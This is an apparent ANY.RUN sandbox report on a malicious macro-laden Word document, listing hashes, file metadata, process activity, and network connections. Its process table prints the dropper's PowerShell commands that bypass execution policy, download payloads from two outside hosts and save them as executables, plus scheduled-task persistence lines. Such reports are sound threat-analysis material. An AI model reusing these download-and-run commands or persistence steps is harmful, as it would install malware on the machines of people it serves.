analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc

Full analysis: https://app.any.run/tasks/bbb0b7e8-7720-4fa3-a0b1-7d8d41a6127b
Verdict: Malicious activity
Analysis date: March 31, 2020, 03:38:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

666575B7B3FF327C8FB154C2E700F237

SHA1:

428DD2ADCADCFBDEB11F43F5C4F7B63F960E8D79

SHA256:

9233133A60362D5507DFE84A491ECF29B9B7A8D5C3FAB52E1D9ACCF2F4A678FB

SSDEEP:

1536:9/r9cNthJFXWDDP9LDjkmvMOxU6upDiWEi1WQ2FGYe5fb47mrRS4X:52NtF0xwF6u9EicFjMjum9t

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 1876)
      • WINWORD.EXE (PID: 3128)
      • WINWORD.EXE (PID: 2520)
      • WINWORD.EXE (PID: 1800)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2564)

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 3456)
      • WINWORD.EXE (PID: 2500)

    • Application launched itself

      • WINWORD.EXE (PID: 2564)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3456)
      • WINWORD.EXE (PID: 2564)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: -
Subject: -
Title: -

XML

ModifyDate: 2020:03:31 01:32:00Z
CreateDate: 2020:03:09 00:44:00Z
RevisionNumber: 1
LastModifiedBy: -
Keywords: -
AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 711
LinksUpToDate: No
Company: -
TitlesOfParts: -
HeadingPairs:
  • タイトル
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 5
DocSecurity: None
Application: Microsoft Office Word
Characters: 606
Words: 106
Pages: 5
TotalEditTime: -
Template: Normal.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1768
ZipCompressedSize: 423
ZipCRC: 0x66751183
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
7
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe winword.exe

Process information

PID
CMD
Path
Indicators
Parent process
2564"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3128"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncNet /TR "%APPDATA%\GncNet\smssr.exe BoostPC GncSoftware" /SC MINUTE /MO 10 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1876"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostPC /TR "%USERPROFILE%\BoostPC\BoostPC.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2520"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostB2B /TR "%USERPROFILE%\BoostPC\b2bClient.exe" /SC MINUTE /MO 16 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1800"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncSoftware /TR "%APPDATA%\GncSoftware\GncSoftware.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3456"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -ep Bypass -Command mkdir $env:APPDATA\GncNet ; $cli = New-Object System.Net.WebClient ; $cli.Headers['User-Agent'] = 'Mozila/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20191232 FireFox/72.0' ; $cli.DownloadFile('http://wp.hitominote.com/smessr/retouch8.php', $env:APPDATA + '\GncNet\smssr.db') ; While($true){ if ((Get-Item $env:APPDATA'\GncNet\smssr.db').length -eq 8704){ Copy-Item -force -Path $env:APPDATA'\GncNet\smssr.db' -Destination $env:APPDATA'\GncNet\smssr.exe'; $rr='2020' ; Break }} ; $cli.DownloadFile('http://wp.hitominote.com/smessr/favicon.ico?'+$rr, $env:APPDATA+'\GncNet\c.db')C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2500"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -ep Bypass -Command mkdir $env:USERPROFILE\BoostPC ; $cli = New-Object System.Net.WebClient ; $cli.Headers['User-Agent'] = 'Mozila/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20191232 FireFox/72.0' ; $cli.DownloadFile('http://nano.toyota-rnd.com/cdn/proc1.php', $env:USERPROFILE + '\BoostPC\BoostPC.db') ; While($true){ if ((Get-Item $env:USERPROFILE'\BoostPC\BoostPC.db').length -eq 11264){ Break }} ; $cli.DownloadFile('http://nano.toyota-rnd.com/cdn/favicon.ico?'+$rr, $env:USERPROFILE+'\BoostPC\c.db')C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Total events
1 956
Read events
1 552
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B16.tmp.cvr
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2B17878.jpg
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{59C3E6C1-8BBB-44DA-8C8C-0D8BB9CF1028}.tmp
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{01B590A7-C9A4-4929-95F0-A17188210614}.tmp
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{002FDB8E-6BEE-4CC0-9E95-3AE38CF04570}.tmp
MD5:
SHA256:
2564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1689654FA717D25B135BE917CA9312D8
SHA256:D31623E5337513929072314B069BA61B26E5367AC84ACECF2503CFCD99D214D6
2564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$33133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.docpgc
MD5:67B6E5A556CD351C0ECFF484FDF63BD9
SHA256:4F3568AE0F7210DEF5BCF824D133771502292C9DFA34D96B218FA2667E91BC69
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3456
WINWORD.EXE
GET
404
88.119.160.2:80
http://wp.hitominote.com/smessr/retouch8.php
LT
html
315 b
malicious
2500
WINWORD.EXE
GET
404
111.90.144.164:80
http://nano.toyota-rnd.com/cdn/proc1.php
MY
html
1.21 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2500
WINWORD.EXE
111.90.144.164:80
nano.toyota-rnd.com
Shinjiru Technology Sdn Bhd
MY
suspicious
3456
WINWORD.EXE
88.119.160.2:80
wp.hitominote.com
Informacines sistemos ir technologijos, UAB
LT
unknown

DNS requests

Domain
IP
Reputation
wp.hitominote.com
  • 88.119.160.2
unknown
nano.toyota-rnd.com
  • 111.90.144.164
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
9233133a60362d5507dfe84a491ecf29b9b7a8d5c3fab52e1d9accf2f4a678fb.doc